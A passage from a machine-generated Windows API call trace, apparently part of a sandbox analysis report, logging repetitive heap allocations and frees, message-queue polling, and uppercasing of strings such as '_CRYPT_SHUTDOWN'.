lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0199.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0199.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0199.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0199.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0199.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0199.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0199.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0199.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0199.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0199.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0199.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0199.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0199.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0199.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0199.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0199.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0199.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0199.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0199.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0199.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0199.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0199.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0199.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0199.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0199.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0199.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0199.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0199.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0199.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0199.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0199.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0199.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0199.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0199.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0199.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0199.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0199.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0199.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0199.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0199.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0199.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0199.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0199.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0199.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0199.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0199.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0199.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0199.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0199.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0199.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0199.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0199.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0199.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0199.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0199.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0199.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0199.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0199.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b648) returned 0x3cc2328 [0199.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0199.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0199.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0199.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0199.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0199.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0199.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0199.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0199.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0199.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0199.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0199.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b648) returned 0x3d0d978 [0199.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3cc2328 | out: hHeap=0x970000) returned 1 [0199.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0199.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0199.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0199.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0199.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0199.941] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0199.941] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0199.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0199.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0199.941] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0199.941] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0199.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0199.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0199.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0199.942] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.942] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0199.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0199.943] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0199.943] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0199.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0199.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0199.943] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0199.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0199.943] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0199.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0199.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.943] HeapFree (in: hHeap=0x970000, 